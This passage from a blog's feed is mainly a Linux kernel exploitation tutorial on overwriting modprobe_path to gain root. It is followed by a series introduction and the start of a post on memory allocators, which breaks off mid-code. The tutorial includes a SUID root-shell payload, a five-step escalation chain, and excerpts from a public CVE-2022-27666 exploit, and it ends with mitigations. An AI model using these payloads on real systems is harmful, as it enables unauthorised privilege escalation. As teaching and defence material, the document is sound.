}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1702">fs/exec.c </a>(v5.18.5)</figcaption></figure><p>Looking at the code above, we can see that <code>search_binary_handler()</code> iterates over each binary format in <code>formats</code> [line 10]. As we iterate over each format, we see if that format&apos;s <code>load_binary()</code><sup>[3]</sup> implementation can process our <code>bprm</code> (which contains a buffer, <code>data</code>, of up to the first <code><a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/uapi/linux/binfmts.h#L19">BINPRM_BUF_SIZE</a></code> bytes of data from our executable) [line 15].</p><p>If we managed to load the binary, we can return successfully [line 21], otherwise if we&apos;ve tried all the formats in <code>format</code> and <code>CONFIG_MODULES</code> <sup>[4]</sup> is is set, we hit the block starting line 27.</p><p>Then comes the check [line 27] we mentioned earlier: if each of the first 4 bytes of our executable are all <code>printable()</code>, we return here.</p><figure class="kg-card kg-code-card"><pre><code class="language-C">#define printable(c) (((c)==&apos;\t&apos;) || ((c)==&apos;\n&apos;) || (0x20&lt;=(c) &amp;&amp; (c)&lt;=0x7e))</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1698">fs/exec.c </a>(v5.18.5)</figcaption></figure><p><code>printable()</code> is a simple macro that yields true if char <code>c</code> is an ASCII printable character (a tab, newline, space or other ASCII characters you see on your keyboard).</p><p>So, if the first four bytes of the binary contains one or more non-<code>printable()</code> bytes<sup>[5]</sup> then comes the interesting part [line 30]: the kernel will attempt to find the appropriate binary format handler by trying to load a module of the expected name &quot;binfmt-WXYZ&quot;, where WXYZ are the hex representation of the first four bytes of our executable. </p><p>For reference we can find the following modules in the kernel (where <code>-</code> and <code>_</code> are interchangable in module names): <code>binfmt_elf</code>, <code>binfmt_script</code>, <code>binfmt_aout</code>. If we tried to <code>execve()</code> a binary whose first for bytes were <code>0xFFFFFFFF</code>, the kernel thread handling the <code>execve()</code> syscall would ultimately reach line 30 and try to <code>request_module(&quot;binfmt-FFFFFFFF&quot;)</code>. </p><p>If we take a look at how <code>request_module()</code> is implemented, we can see that it is actually a macro for <code>_request_module()</code>: </p><figure class="kg-card kg-code-card"><pre><code class="language-C">int __request_module(bool wait, const char *name, ...);
#define request_module(mod...) __request_module(true, mod)</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/kmod.h#L24">include/linux/kmod.h</a> (v5.18.5)</figcaption></figure><p>By taking a look at <code>_request_module()</code> we can see that after carrying out the necessary sanity and security checks, that it ultimately calls <code>call_modprobe()</code> [line 29]:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">/**
 * __request_module - try to load a kernel module
 * @wait: wait (or not) for the operation to complete
 * @fmt: printf style format string for the name of the module
 * @...: arguments as specified in the format string
 ...
 * If module auto-loading support is disabled then this function
 * simply returns -ENOENT.
 */
int __request_module(bool wait, const char *fmt, ...)
{
	va_list args;
	char module_name[MODULE_NAME_LEN];
	int ret;

    ...
	if (!modprobe_path[0])
		return -ENOENT;

    ...
	if (ret &gt;= MODULE_NAME_LEN)
		return -ENAMETOOLONG;

	ret = security_kernel_module_request(module_name);
	if (ret)
		return ret;

    ...
	ret = call_modprobe(module_name, wait ? UMH_WAIT_PROC : UMH_WAIT_EXEC);
    ...
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.5/source/kernel/kmod.c#L124">kernel/kmod.c</a> (v5.18.5)</figcaption></figure><p>Finally (we&apos;re almost there, I promise!) we reach <code>call_modprobe()</code>. I&apos;ll avoid spamming you with more source, but for context, <code><a href="https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper-setup.html">call_usermoderhelper_setup()</a></code> [line 25] prepares the kernel to &quot;call a usermode helper&quot;, which for us right now essentially means running an executable in userspace as root. <code><a href="https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper-exec.html">call_usermodehelper_exec()</a></code> [line 30] then does the job.</p><pre><code class="language-C">static int call_modprobe(char *module_name, int wait)
{
	struct subprocess_info *info;
	static char *envp[] = {
		&quot;HOME=/&quot;,
		&quot;TERM=linux&quot;,
		&quot;PATH=/sbin:/usr/sbin:/bin:/usr/bin&quot;,
		NULL
	};

	char **argv = kmalloc(sizeof(char *[5]), GFP_KERNEL);
	if (!argv)
		goto out;

	module_name = kstrdup(module_name, GFP_KERNEL);
	if (!module_name)
		goto free_argv;

	argv[0] = modprobe_path;
	argv[1] = &quot;-q&quot;;
	argv[2] = &quot;--&quot;;
	argv[3] = module_name;	/* check free_modprobe_argv() */
	argv[4] = NULL;

	info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
					 NULL, free_modprobe_argv, NULL);
	if (!info)
		goto free_module_name;

	return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
	...
}</code></pre><p>On lines 19-23 you can see the argument vector we&apos;re using. So in our current context of a typical Linux system these days, trying to execute a binary beginning <code>0xFFFFFFFF</code>, as an unprivileged user we&apos;d ultimately be running the bash equivalent of:</p><pre><code class="language-sh">root# /usr/bin/modprobe -q -- binfmt-FFFFFFFF   </code></pre><p>Where <code>/usr/bin/modprobe</code> is the value found in the kernel symbol <code>modprobe_path</code>. </p><p>What&apos;s important here is that the binary being executed in this root process is defined by the value of the kernel symbol <code>modprobe_path</code>.</p><h3 id="a-pseudo-case-study">A Pseudo Case-Study</h3><p>To recap what we&apos;ve covered so far:</p><ul><li>An unprivileged user can create a binary starting <code>0xFFFFFFFF</code> and try to <code>execve()</code> it, causing the kernel to create a root process running the equivalent of <code>$modprobe_path -q -- binfmt-FFFFFFFF</code>, where <code>$modprobe_path</code> here is the value stored in the kernel symbol <code>modprobe_path</code></li><li>As a result, if an attacker can control <code>modprobe_path</code> then they can control the binary being executed by the root process</li></ul><p>Wait, so we need to overwrite a kernel symbol? If we can already do that haven&apos;t we already won?! Valid questions! The kernel is vast and complex, as such so is kernel exploitation - there are many types of bugs and ways to achieve privilege escalation.</p><p>Similarly, the motivations and goals of attackers varies. As we&apos;re looking at LPEs, let&apos;s assume the goal here is to go from unprivileged user to having root access.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/image-5.png" class="kg-image" alt="Kernel Exploitation Techniques: modprobe_path" loading="lazy" width="551" height="171"></figure><p>Take this (very) simplistic view where we have a kernel memory corruption vulnerability, such as a heap buffer overflow. Ideally, we&apos;re able to leverage this to gain a control flow hijacking primitive (CFHP), where we can influence the flow of kernel code execution; say we manage to use our overflow to corrupt a pointer<sup>[6]</sup> and go from there.</p><p>If we can use our CFHP to overwrite arbitrary kernel addresses, we can use the <code>modprobe_path</code> technique we&apos;ve talked about to make the final pivot from kernel code execution to having root access in userspace (which is much more usable lol).</p><p>How, you ask? Well, first things first let&apos;s take a look at an example of a typical binary we can overwrite &amp; point <code>modprobe_path</code> to:</p><pre><code class="language-C">int main()
{
    system(&quot;cp /usr/bin/sh /tmp/sh&quot;);
    system(&quot;chown root:root /tmp/sh&quot;);
    system(&quot;chmod 4755 /tmp/sh&quot;);
}</code></pre><p>This payload sets the owner of <code>/tmp/sh</code> as root [4], and then gives it the SUID bit [6]. </p><p>This bit means that regardless of runs the file, it runs with the owners permissions. In this instance,, if a user runs <code>/tmp/sh</code> after this, it will get a root shell<sup><a href="https://www.redhat.com/sysadmin/suid-sgid-sticky-bit">[7]</a></sup>.</p><p>So, to wrap our pseudo case-study up, our overall exploit chain might look like this:</p><ol><li>Create a binary (e.g. <code>/tmp/trigger</code>) to trigger the execution of <code>modprobe_path</code> as root via the kernel&apos;s usermodehelper, by starting it with bytes <code>0xFFFFFFFF</code> </li><li>Compile &amp; place the payload from the snippet above (e.g. <code>/tmp/pwn</code>)</li><li>Trigger our arbitrary address write (e.g. via some kernell mem corruption bug), using the AAW primitive to overwrite <code>modprobe_path</code> with our payload, <code>/tmp/pwn</code></li><li>Execute <code>/tmp/trigger</code>, which will cause the kernel to run <code>/tmp/pwn</code> (the new value of <code>modprobe_path</code>) as root </li><li>As an unprivileged user we can now get a root shell by running <code>/tmp/sh</code> which is now a SUID executable owned by root</li></ol><h4 id="actual-examples">Actual Examples</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/07/welcome_to_the_real_world.gif" class="kg-image" alt="Kernel Exploitation Techniques: modprobe_path" loading="lazy" width="470" height="193"></figure><p>So we&apos;ve covered a hasty pseudo-case study of how an attacker might use this <code>modprobe_path</code> technique to escalate privileges via a kernel AAW. Below are a few recent real-world write-ups and examples of this technique put to use:</p><ol><li><a href="https://etenal.me/archives/1825">CVE-2022-27666: Exploit esp6 modules</a> in Linux kernel by <a href="https://twitter.com/ETenal7">@Etenal7</a></li><li><a href="https://www.willsroot.io/2022/01/cve-2022-0185.html">CVE-2022-0185 - Winning a $31337 Bounty after Pwning Ubuntu and Escaping Google&apos;s KCTF Containers</a> by <a href="https://twitter.com/cor_ctf">@cor_ctf</a></li><li><a href="https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/">Linux Kernel Exploitation Technique: Overwriting modprobe_path</a> by <a href="https://twitter.com/_lkmidas">@_lkmidas</a></li></ol><h5 id="cve-2022-27666-by-etenal7">CVE-2022-27666 by <a href="https://twitter.com/ETenal7">@Etenal7</a></h5><p>I&apos;ve actually retroactively added this section after finishing the post, figuring it can&apos;t hurt to explore some real-world <a href="https://github.com/plummm/CVE-2022-27666">exploit code </a>making use of this technique. </p><p>So using what we&apos;ve learnt so far, particularly from our pseudo-case study, let&apos;s see how <a href="https://twitter.com/ETenal7">@Etenal7</a> makes use of this technique in their exploit (repo <a href="https://github.com/plummm/CVE-2022-27666">here</a>).</p><p>To read more on the memory corruption side of things and how they get an AAW primitive to be able to overwrite <code>modprobe_path</code>, check out the awesome <a href="https://etenal.me/archives/1825">write-up</a>. The tl;dr is they exploit a 8-page heap overflow (CVE-2022-27666), do some neat heap feng shui with the page allocator and the slab allocator, to ultimately gain a KASLR leak and AAW primitive.</p><p>Diving in, first of all we can see a similar payload in the file <code><a href="https://github.com/plummm/CVE-2022-27666/blob/main/get_rooot.c">get_rooot.c</a></code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;

int main()
{
    system(&quot;chown root:root /tmp/myshell&quot;);       [0]
    system(&quot;chmod 4755 /tmp/myshell&quot;);            [1]
    system(&quot;/usr/bin/touch /tmp/exploited&quot;);      [2]
}</code></pre><figcaption><a href="https://github.com/plummm/CVE-2022-27666/blob/main/get_rooot.c">get_rooot.c</a></figcaption></figure><p>Besides creating a root owned [0] SUID [1] shell, they also create a marker file <code>/tmp/exploited</code> to easily check the payload has been run later [2]. </p><p>Moving onto the core exploit logic, over in <code><a href="https://github.com/plummm/CVE-2022-27666/blob/main/poc.c">poc.c</a></code>, we can see the setup of the invalid binary used to eventually trigger <code>modprobe_path</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">...
#define PROC_MODPROBE_TRIGGER &quot;/tmp/modprobe_trigger&quot;
...
void modprobe_trigger()
{
  execve(PROC_MODPROBE_TRIGGER, NULL, NULL);
}
...
void modprobe_init()
{
  int fd = open(PROC_MODPROBE_TRIGGER, O_RDWR | O_CREAT);      [0]
  if (fd &lt; 0)
  {
      perror(&quot;trigger creation failed&quot;);
      exit(-1);
  }
  char root[] = &quot;\xff\xff\xff\xff&quot;;                            
  write(fd, root, sizeof(root));                               [1]
  close(fd);
  chmod(PROC_MODPROBE_TRIGGER, 0777);                          [2]
}</code></pre><figcaption><a href="https://github.com/plummm/CVE-2022-27666/blob/main/poc.c">poc.c</a></figcaption></figure><p>We can see they programmatically create the <code>modprobe_path</code> trigger in <code>modprobe_init()</code>, creating an executable [2] at path <code>PROC_MODPROBE_TRIGGER</code> [0] which simply consists of an invalid 4 byte header, <code>&quot;\xff\xff\xff\xff&quot;</code> [1]. </p><p>This can later be triggered to make the kernel execute, the hopefully overwritten,<code>modprobe_path</code> via <code>modprobe_trigger()</code>.</p><p>Below I&apos;ve highlighted the code responsible for performing the AAW, triggering the corrupted <code>modprobe_path</code> and finally popping the payload:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">char *evil_str = &quot;/tmp/get_rooot\x00&quot;; [0] (from fuse_evil.c)
...
void overwrite_modprobe()
{
  void *modprobe_path = addr_modprobe_path + kaslr_offset; [1]
  ...

    ...
    arb_write(modprobe_path-8, strlen(evil_str), ...);     [2]
    ...
    sleep(1);
    modprobe_trigger();                                    [3]
    sleep(1);
    if (am_i_root()) {                                     [4]
      ...                                                  [5]
    }
    printf(&quot;[+] Not root, try again\n&quot;);
  }
  ...
}

int am_i_root()
{
  struct stat buffer;
  int exist = stat(&quot;/tmp/exploited&quot;, &amp;buffer);
  if(exist == 0)
      return 1;
  else  
      return 0;
}</code></pre><figcaption><a href="https://github.com/plummm/CVE-2022-27666/blob/main/poc.c">poc.c</a></figcaption></figure><p>First they use the leaked KALSR offset to work out the address of the <code>modprobe_path</code> kernel symbol [1]. Next, the AAW is triggered [2], overwriting the original value of <code>modprobe_path</code> with the path to the payload, <code>/tmp/get_rooot</code> [0].</p><p>Then, with <code>modprobe_path</code> hopefully overwritten, they call <code>modprobe_trigger()</code> [3] to execute tbe invalid binary so the kernel ultilmately executes the new <code>modprobe_path</code>.</p><p>Finally <code>am_i_root()</code> is called to check for success by looking for the marker file <code>/tmp/exploited</code> that is created when the payload <code>/tmp/get_rooot</code> is run by <code>usermodehelper</code>. If it exists, we can pop a shell [5].</p><h3 id="mitigations">Mitigations</h3><p>Now we have an understanding of the technique, how it&apos;s used to facilitate LPE and some examples of real-world usecases ... how do we mitigate it?</p><p><code>CONFIG_STATIC_USERMODEHELPER</code> was introduced in 4.11<sup>[8]</sup>, back in 2017 by <a href="https://twitter.com/gregkh">Greg KH</a><sup>[9]</sup>, specifically to mitigate this kind of attack surface. </p><h4 id="one-helper-to-rule-them-all">One Helper to Rule Them All</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/07/gollum_scared.gif" class="kg-image" alt="Kernel Exploitation Techniques: modprobe_path" loading="lazy" width="500" height="211"></figure><p>Looking at <code>call_modprobe()</code> earlier, the kernel specifies an executable path via <code>call_usermodehelper_setup(path, ...)</code> and then <code>call_usermodehelper_exec()</code> will execute the binary specified by <code>path</code>. Relevant to us, is that <code>modprobe_path</code> is passed to <code>call_usermodehelper_setup()</code> and we can change <code>modprobe_path</code>.</p><p>With this config enabled, regardless of the <code>path</code> passed to <code>call_usermodehelper_setup()</code>, the kernel will only directly execute a single usermode binary defined by <code>CONFIG_STATIC_USERMODEHELPER_PATH</code><sup>[10]</sup>. This path is read-only, so can&apos;t be changed (without write protection bit flipping shenanigans<sup>[11]</sup>). </p><figure class="kg-card kg-code-card"><pre><code class="language-C">struct subprocess_info *call_usermodehelper_setup(const char *path, ...)

{
	struct subprocess_info *sub_info;
	...
    
#ifdef CONFIG_STATIC_USERMODEHELPER
	sub_info-&gt;path = CONFIG_STATIC_USERMODEHELPER_PATH;
#else
	sub_info-&gt;path = path;
#endif

	...
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v5.18.5/source/kernel/umh.c#L358">kernel/umh.c</a> (v5.18.5)</figcaption></figure><p>It is then the task of the static executable defined by <code>CONFIG_STATIC_USERMODEHELPER_PATH</code> to call the appropriate usermode helper, e.g. <code>/usr/bin/modprobe</code>. </p><p>Alternatively, <code>CONFIG_STATIC_USERMODEHELPER</code> can be enabled but <code>CONFIG_STATIC_USERMODEHELPER_PATH</code> can be set to <code>&quot;&quot;</code>, disabling all usermode helper programs entirely; completely mitigating the <code>modprobe_path</code> technique.</p><h4 id="so-were-all-good">So We&apos;re All Good?</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/07/whats_the_big_deal.gif" class="kg-image" alt="Kernel Exploitation Techniques: modprobe_path" loading="lazy" width="480" height="270"></figure><p>Awesome, you mean this whole thing was patched back in 2017? EZ PZ, next technique pls. Not so fast! Despite being introduced into the kernel back 4.11 it still hasn&apos;t made it&apos;s way into the default configurations for many popular distributions.</p><p>As of writing, this includes the latest versions of Ubuntu, Fedora and EndeavourOS; I&apos;m sure there&apos;s many more but that&apos;s all I know off the top of my head.</p><p>You can check your system by searching your config, typically in<code>/boot/config...</code> or <code>/proc/config</code>, for <code>CONFIG_STATIC_USERMODEHELPER</code>. Alternatively I heartily recommend <a href="https://twitter.com/a13xp0p0v">@a13xp0p0v</a>&apos;s <a href="https://github.com/a13xp0p0v/kconfig-hardened-check">kconfig-hardened-check</a>.</p><p>I don&apos;t mean to point fingers though, the Linux ecosystem is vast and complex, with many moving parts and users. I can imagine there&apos;s plenty of components that make assumptions about/rely on <code>usermodehelper</code>, making removing it outright (via not setting <code>CONFIG_STATIC_USERMODEHELPER_PATH</code>) difficult?</p><p>The alternative is to implement the single usermode helper, in such as a way as to securely carry out the same functionality for users of <code>usermodehelper</code> while still mitigating similar attack surfaces and not introducing new ones.</p><h4 id="alternatives">Alternatives</h4><p><code>CONFIG_STATIC_USERMODEHELPER</code> isn&apos;t the only way to mitigate this technique, but it is one of the more direct, having been designed with this attack surface in mind.</p><p>From the code analysis earlier, some of you will also have noticed the more heavy handed approach of disabling <code>CONFIG_MODULES</code> entirely, preventing the <code>request_module()</code> code path from being reachable entirely, or any module loading for that matter - certainly an effective mitigation.</p><p>However, this approach suffers the same issue (though to a greater extent) as disabling <code>usermodehelper</code>, in that it&apos;s gonna remove a pretty integral feature that many aspects of modern distros for your average user have come to make use of.</p><p>That&apos;s not to say there isn&apos;t an argument for disabling autoloading, reducing a broader attack surface than <code>CONFIG_STATIC_USERMODEHELPER</code>; it all depends on use case. </p><hr><ol><li><a href="http://www.vishalchovatiya.com/program-gets-run-linux/">http://www.vishalchovatiya.com/program-gets-run-linux/</a></li><li>From the comment above <code><a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L18">struct linux_binprm</a></code> definition</li><li>e.g. <code>load_elf_binary()</code>, <code>load_script()</code> </li><li><a href="https://cateee.net/lkddb/web-lkddb/MODULES.html">CONFIG_MODULES</a> enables loadable module support, without this we can&apos;t <code>modprobe</code> new modules into the kernel</li><li>I believe the intention behind this check is to ignore invoking <code>request_module()</code> for plain-text files (that haven&apos;t already been picked up by <code>binfmt_script</code> at this point), under the assumption other binary formats will have at one non-printable byte.</li><li>If KASLR is present we also need an information leak, to know the address of kernell symbols, e.g. <code>modprobe_path</code> in order to rewrite it </li><li><a href="https://www.redhat.com/sysadmin/suid-sgid-sticky-bit">https://www.redhat.com/sysadmin/suid-sgid-sticky-bit</a></li><li><a href="https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html">https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html</a></li><li><a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64e90a8acb8590c2468c919f803652f081e3a4bf">https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64e90a8acb8590c2468c919f803652f081e3a4bf</a></li><li><a href="https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER_PATH.html">https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER_PATH.html</a></li><li>Which while doable, shifts the requirements from arbitrary kernel address write to a very lenient ROP chain or some kernel shellcode execution</li></ol><h2 id="conclusion">Conclusion</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/07/i_think_our_work_here_is_done.gif" class="kg-image" alt="Kernel Exploitation Techniques: modprobe_path" loading="lazy" width="500" height="282"></figure><p>Not gonna lie, I thought this series might be an opportunity for me to whack out some shorter &lt;1000 word posts, but alas. Regardless, hopefully I&apos;ve given you some useful insights and an understanding into a popular technique used in kernel exploit development to achieve local privilege escalation on modern kernels.</p><p>Although an effective mitigation exists within the kernel, this doesn&apos;t protect anyone unless it&apos;s enabled in the kernel configuration. This technique is particularly popular among attackers, as it&apos;s a relatively low maintenance technique, requiring the offset for only one kernel symbol: <code>modprobe_path</code>. Of course, you still need an AAW primitive.</p><p>Going forward, there&apos;s plenty of more content for me to dive into. If you have anything in particular you&apos;re eager for me to cover, feel free to <a href="https://twitter.com/sam4k1">@me</a>. </p><p>Some ideas include tackling the various aspects of heap feng shui, ROP chains and its various sub-strands, broader approaches to exploiting various bug types such as use-after-frees, overflows etc. The list goes on and on! But that&apos;s all for now.</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[LiKE: A Series on Linux Kernel Exploitation]]></title><description><![CDATA[Thought the Linternals series was hype? Get ready for the even SEO friendlier LiKE, a series on Linux kernel exploitation.]]></description><link>https://sam4k.com/like-a-series-on-linux-kernel-exploitation/</link><guid isPermaLink="false">6266f3bd1b5b6d052837bfe7</guid><category><![CDATA[linux]]></category><category><![CDATA[VRED]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Mon, 04 Jul 2022 14:50:00 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/04/tired_computer.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/04/tired_computer.gif" alt="LiKE: A Series on Linux Kernel Exploitation"><p>So you thought the <a href="https://sam4k.com/linternals-introduction/">Linternals</a> series was hype? Get ready for the even SEO friendlier LiKE, a series on all things Linux kernel exploitation.</p><p>I just couldn&apos;t help myself, despite spending my work days doing kernel exploit development, I&apos;m just that keen that I want to also cover it on my personal blog. </p><p>Seriously though, I think it&apos;s an extremely interesting topic for us to cover and will tie in nicely with the kernel internals knowledge we pick up from the <a href="https://sam4k.com/linternals-introduction/">Linternals</a> series. </p><p>Highlighted well in P0&apos;s recent post <a href="https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html">&quot;The More You Know, The More You Know You Don&#x2019;t Know&quot;</a>, I think there is value in sharing and educating industry on the methodology and techniques that are being used by attackers. Plus kernel stuff is just cool right?</p><p>In terms of actual content, there&apos;s lots of scope for topics we can cover, and I&apos;m happy to hear your thoughts and suggestions. I have a few different areas I&apos;d like to cover:</p><ul><li><strong>Kernel exploitation techniques</strong>: often times kernel exploitation techniques are covered as part of a broader post on exploiting a particular bug, so I want to spend some time putting the spotlight on specific techniques - talking about when, why and how they&apos;re used as well as covering existing, future or possible mitigations. </li><li>Perhaps also highlighting <strong>mitigations</strong>? Talking about existing or upcoming security mitigations and how they impact(ed) the kernel exploitation space</li><li><strong>Classic kernel writeups</strong>: whether CTFs or real world PoCs, I&apos;m happy to spend some time providing technical coverage/analysis of cool stuff if that content isn&apos;t already out there</li></ul><p>Feel free to fire any questions, suggestions or *gasp* corrections my way <a href="https://twitter.com/sam4k1">@sam4k</a>.</p><h2 id="contents">Contents</h2><p><s>Similar to the Linternals post, going forward I&apos;ll keep this up-to-date as a sort of table of content for published posts in the LiKE series.</s></p><p>I&apos;ve since moved the contents to a <a href="https://sam4k.com/kernel-exploitation/">standalone page</a>, which you can reach from the navigation bar at the top, to keep things a bit more organised!</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Linternals: Introducing Memory Allocators & The Page Allocator]]></title><description><![CDATA[I know you've all been waiting for it, that's right, we're going to be taking a dive into another exciting aspect of Linux internals: memory allocators! ]]></description><link>https://sam4k.com/linternals-memory-allocators-part-1/</link><guid isPermaLink="false">61cdb1e6484d4d42c8e4a679</guid><category><![CDATA[linternals]]></category><category><![CDATA[linux]]></category><category><![CDATA[memory]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Fri, 10 Jun 2022 16:30:00 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/04/linternals.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/04/linternals.gif" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator"><p>I know you&apos;ve all been waiting for it, that&apos;s right, we&apos;re going to be taking a dive into another exciting aspect of Linux internals: memory allocators! </p><p>Don&apos;t worry, I haven&apos;t forgotten about the <a href="https://sam4k.com/linternals-virtual-memory-part-1/">virtual memory series</a>, but today I thought we&apos;d spice things up and shift our focus towards memory allocation in the Linux kernel. As always, I&apos;ll aim to lay the groundwork with a high level overview of things before gradually diving into some more detail.</p><p>In this first part (of many, no doubt), we&apos;ll cover the role of memory allocators within the Linux kernel at a high level to give some general context on the topic. We&apos;ll then take a look at the first of two types of allocator used by the kernel: the buddy (page) allocator. </p><p>We&apos;ll cover the high level implementation of the buddy allocator, with some code snippets from the kernel to complement this understanding, before diving into some more detail and wrapping things up by talking about some pros/cons of the buddy allocator. </p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#0x01-so-memory-allocators">0x01 So, Memory Allocators?</a></li>
<li><a href="#0x02-the-buddy-page-allocator">0x02 The Buddy (Page) Allocator</a>
<ul>
<li><a href="#page-primer">Page Primer</a></li>
<li><a href="#buddy-system-algorithm">Buddy System Algorithm</a></li>
<li><a href="#nodes-zones-memory-stuff">Nodes, Zones &amp; Memory Stuff</a>
<ul>
<li><a href="#expanding-on-freearea">Expanding on free_area</a></li>
<li><a href="#touching-on-struct-page">Touching on struct page</a></li>
</ul>
</li>
<li><a href="#using-the-buddy-allocator">Using The Buddy Allocator</a></li>
<li><a href="#pros-cons">Pros &amp; Cons</a></li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="0x01-so-memory-allocators">0x01 So, Memory Allocators?</h2><p>Alright, let&apos;s get stuck in! Like I mentioned, we&apos;ll start with the basics - what is a memory allocator? I could just say we&apos;re talking about a collection of code which looks to manage available memory, typically providing an API to <code>allocate()</code> and <code>free()</code> this memory. &#xA0;</p><p>But what does that mean? For a moment let&apos;s forget about the complexities of modern day memory management in OS&apos;s, with all the various interconnected components:</p><p>Picture a computer with some physical memory, running a Linux kernel and a lot of usermode processes (think of all the chrome tabs). Both the kernel and the various user processes require physical memory to store the various data behind the virtual mappings we covered in parts <a href="https://sam4k.com/linternals-virtual-memory-0x02/">2</a> &amp; <a href="https://sam4k.com/linternals-virtual-memory-part-3/">3</a> of the virtual memory series. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/this_is_fine.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="480" height="270"></figure><p>Now picture the absolute chaos as processes are using the same physical memory addresses at the same time, clobbering each other&apos;s data, oh lord, even the kernel&apos;s data is getting overwritten? Is that chrome tab even using a physical address that exists?!</p><p>That is where the kernel&apos;s memory allocator comes in, acting as a gatekeeper of sorts for allocating memory when it is needed. It&apos;s job is to keep track of how much memory there is, what&apos;s free and what&apos;s in use. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/06/you_shall_not_pass.gif" class="kg-image" alt="Linternals: Introducing Memory Allocators &amp; The Page Allocator" loading="lazy" width="480" height="200"></figure><p>Rather than every process for themselves, if something requires a chunk of memory to store stuff in, it asks the memory allocator - simple enough right? </p><h2 id="0x02-the-buddy-page-allocator">0x02 The Buddy (Page) Allocator </h2><p>Now we&apos;ve got a high level understanding of memory allocators, let&apos;s take a look at how memory is managed and allocated in the Linux kernel. </p><p>While several implementations for memory allocation exist within the Linux kernel, they mainly work on top of the buddy allocator (aka page allocator), making it the fundamental memory allocator within the Linux kernel. &#xA0;</p><h3 id="page-primer">Page Primer</h3><p>At this point, we should probably rewind and clarify what exactly a &quot;page&quot; is. As part of it&apos;s memory management approach, the Linux kernel (along with the CPU) divides virtual memory into &quot;pages&quot; which are <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18">PAGE_SIZE</a></code> bytes of contiguous virtual memory.</p><p>Typically defined as <code>0x1000</code> bytes, or 4KB, pages are the common unit for managing memory in the Linux kernel. This is why you&apos;ll often see things in memory aligned on page boundaries, for example. </p><p>Anyway, while a fascinating topic, I&apos;ll not derail us too much! However this is definitely something I&apos;ll touch on in more detail in future posts, so don&apos;t worry :) </p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2757;</div><div class="kg-callout-text">Going forward, unless I&apos;m explicit, in examples using <code>PAGE_SIZE</code>, I&apos;ll assume a typical <code>PAGE_SIZE</code> of <code>0x1000</code>.</div></div><h3 id="buddy-system-algorithm">Buddy System Algorithm</h3><p>Back to the topic at hand - we&apos;ve covered where the &quot;page&quot; in page allocator comes from, what about the buddy part? Queue the buddy system algorithm (BSA) behind the buddy allocator, starting with the basics:</p><p>The buddy allocator tracks <strong>free</strong> chunks of <strong>physically contiguous</strong> memory via a freelist, <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L632">free_area[MAX_ORDER]</a></code>, which is an array of <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/mmzone.h#L108">struct free_area</a></code>. </p><p>Each <code>struct free_area</code> in the freelist contains a doubly linked circular list (the <code><a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/linux/types.h#L178">struct list_head</a></code>) pointing to the free chunks of memory.</p><figure class="kg-card kg-code-card"><pre><code>...
struct free_area        free_area[MAX_ORDER]; 
...

struct free_area {
    struct list_head    free_list; 
    unsigned long       nr_free;
